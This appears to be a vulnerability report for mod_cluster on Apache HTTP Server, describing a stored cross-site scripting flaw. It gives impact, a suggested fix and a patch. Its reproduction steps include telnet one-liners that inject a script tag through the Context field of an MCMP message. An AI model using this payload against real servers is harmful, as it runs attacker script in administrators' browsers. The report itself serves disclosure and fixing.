This is a nasty one indeed

Steps to reproduce

• start Apache HTTP Server with mod_cluster
• send these messages (provided you test instance listens on 127.0.0.1)

  { echo "CONFIG / HTTP/1.1"; echo "Host: localhost.localdomain:6666"; echo "Content-Length: 95"; echo "User-Agent: Prdel"; echo ""; echo "JVMRoute=fake-1&Ho5t=127.0.0.1&Maxattempts=1&Port=8009&StickySessionForce=No&Type=ajp&ping=10"; sleep 1;} | telnet 127.0.0.1 6666
  { echo "ENABLE-APP / HTTP/1.1"; echo "Host: localhost.localdomain:6666"; echo "Content-Length: 102"; echo "User-Agent: ClusterListener%2F1.0"; echo ""; echo 'JVMRoute%3Dfake-1%26Alias%3Ddefault-host%26Context%3D%2FX%3Cscript%3Ealert(%27X%27)%3B%3C%2Fscript%3E'; sleep 1;} | telnet 127.0.0.1 6666
  

• Open http://localhost:6666/mod_cluster_manager and enjoy JavaScript pop-up Alert being executed.

Impact

• Anyone with access to the (hopefully only internal) network from which MCMP messages are allowed to come from could send these messages and execute arbitrary JavaScript code.

Suggestion

• Leverage apr_escape* to sanitize MCMP messages.

Proposed patch

• patch.new.best.patch: MCMP messages containing suspicious characters are discarded.